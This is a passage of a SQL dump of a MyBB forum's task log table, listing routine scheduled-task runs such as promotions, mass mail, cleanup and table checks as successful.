INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10480', '5', '1350344723', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10481', '9', '1350346384', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10482', '3', '1350346390', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10483', '1', '1350346393', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10484', '2', '1350346404', 'The daily cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10485', '7', '1350346482', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10486', '11', '1350346512', 'The delayed moderation task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10487', '5', '1350346586', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10488', '5', '1350347119', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10489', '9', '1350347138', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10490', '3', '1350347407', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10491', '9', '1350348153', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10492', '5', '1350348326', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10493', '9', '1350349149', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10494', '3', '1350349155', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10495', '1', '1350349215', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10496', '7', '1350349220', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10497', '5', '1350349526', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10498', '9', '1350349844', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10499', '5', '1350351752', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10500', '9', '1350352503', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10501', '3', '1350352514', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10502', '5', '1350352525', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10503', '3', '1350352747', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10504', '1', '1350352801', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10505', '7', '1350352810', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10506', '5', '1350353230', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10507', '9', '1350353475', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10508', '5', '1350354321', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10509', '9', '1350354380', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10510', '3', '1350354683', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10511', '9', '1350355373', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10512', '5', '1350355501', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10513', '9', '1350356208', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10514', '3', '1350356352', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10515', '1', '1350356456', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10516', '7', '1350356460', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10517', '5', '1350356819', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10518', '9', '1350357166', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10519', '5', '1350357904', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10520', '9', '1350357985', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10521', '3', '1350358214', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10522', '9', '1350358872', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10523', '5', '1350359264', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10524', '9', '1350359718', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10525', '3', '1350359941', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10526', '1', '1350360002', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10527', '7', '1350360009', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10528', '5', '1350360352', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10529', '9', '1350360607', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10530', '5', '1350361664', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10531', '9', '1350361676', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10532', '3', '1350361902', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10533', '9', '1350362506', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10534', '5', '1350366927', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10535', '9', '1350369415', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10536', '3', '1350370305', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10537', '1', '1350373142', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10538', '7', '1350373166', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10539', '5', '1350373764', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10540', '9', '1350373775', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10541', '3', '1350373798', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10542', '9', '1350374250', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10543', '3', '1350374359', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10544', '1', '1350374530', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10545', '7', '1350374553', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10546', '5', '1350374740', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10547', '9', '1350375161', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10548', '5', '1350376641', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10549', '9', '1350376658', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10550', '3', '1350376671', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10551', '9', '1350376821', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10552', '5', '1350377106', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10553', '9', '1350378883', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10554', '3', '1350378888', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10555', '1', '1350379096', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10556', '7', '1350379445', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10557', '5', '1350379452', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10558', '5', '1350379521', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10559', '9', '1350379630', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10560', '3', '1350380194', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10561', '9', '1350383224', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10562', '5', '1350383228', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10563', '3', '1350383238', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10564', '1', '1350383242', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10565', '7', '1350383497', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10566', '3', '1350383659', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10567', '9', '1350384008', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10568', '5', '1350384321', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10569', '9', '1350386184', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10570', '3', '1350386199', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10571', '1', '1350386205', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10572', '7', '1350386235', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10573', '5', '1350386268', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10574', '5', '1350386835', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10575', '9', '1350386840', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10576', '3', '1350387012', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10577', '9', '1350388152', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10578', '5', '1350388155', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10579', '9', '1350388537', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10580', '3', '1350388823', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10581', '1', '1350388850', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10582', '4', '1350388877', 'The database backup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10583', '7', '1350388879', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10584', '5', '1350389239', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10585', '9', '1350389460', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10586', '5', '1350390940', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10587', '9', '1350391167', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10588', '3', '1350391171', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10589', '9', '1350391214', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10590', '5', '1350391530', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10591', '9', '1350392974', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10592', '3', '1350392999', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10593', '1', '1350393008', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10594', '7', '1350393010', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10595', '5', '1350393033', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10596', '9', '1350393039', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10597', '5', '1350394039', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10598', '9', '1350394049', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10599', '3', '1350394300', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10600', '9', '1350394987', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10601', '5', '1350395119', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10602', '9', '1350395735', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10603', '3', '1350396345', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10604', '1', '1350396351', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10605', '7', '1350396413', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10606', '5', '1350396461', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10607', '9', '1350398732', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10608', '5', '1350398760', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10609', '3', '1350398762', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10610', '9', '1350399340', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10611', '3', '1350399552', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10612', '1', '1350399949', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10613', '7', '1350399973', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10614', '5', '1350399977', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10615', '9', '1350400459', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10616', '5', '1350401224', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10617', '9', '1350401256', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10618', '3', '1350401476', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10619', '9', '1350402178', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10620', '5', '1350402504', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10621', '9', '1350402971', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10622', '3', '1350403146', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10623', '1', '1350403921', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10624', '5', '1350403941', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10625', '7', '1350403935', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10626', '9', '1350403954', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10627', '5', '1350404704', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10628', '9', '1350404766', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10629', '3', '1350405003', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10630', '9', '1350405608', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10631', '5', '1350406154', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10632', '9', '1350406525', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10633', '3', '1350406836', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10634', '1', '1350406838', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10635', '7', '1350406900', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10636', '5', '1350407305', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10637', '9', '1350407673', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10638', '5', '1350408307', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10639', '9', '1350408386', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10640', '3', '1350408721', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10641', '9', '1350409208', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10642', '5', '1350409535', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10643', '9', '1350410363', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10644', '3', '1350410366', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10645', '1', '1350410699', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10646', '7', '1350410709', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10647', '5', '1350410740', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10648', '9', '1350411544', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10649', '5', '1350412193', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10650', '9', '1350412334', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10651', '3', '1350412337', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10652', '9', '1350413693', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10653', '5', '1350413741', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10654', '9', '1350413780', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10655', '3', '1350414325', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10656', '1', '1350414370', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10657', '7', '1350414435', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10658', '5', '1350414438', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10659', '9', '1350415273', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10660', '5', '1350415615', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10661', '9', '1350415620', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10662', '3', '1350415892', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10663', '9', '1350416417', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10664', '5', '1350416709', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10665', '9', '1350417432', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10666', '3', '1350417578', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10667', '1', '1350417601', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10668', '7', '1350417604', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10669', '5', '1350417984', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10670', '9', '1350418293', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10671', '5', '1350419122', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10672', '9', '1350419129', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10673', '3', '1350419411', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10674', '9', '1350420015', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10675', '5', '1350420306', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10676', '9', '1350420944', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10677', '3', '1350421142', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10678', '1', '1350421209', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10679', '7', '1350421223', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10680', '5', '1350421502', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10681', '9', '1350421806', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10682', '5', '1350422701', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10683', '9', '1350422745', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10684', '3', '1350423163', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, 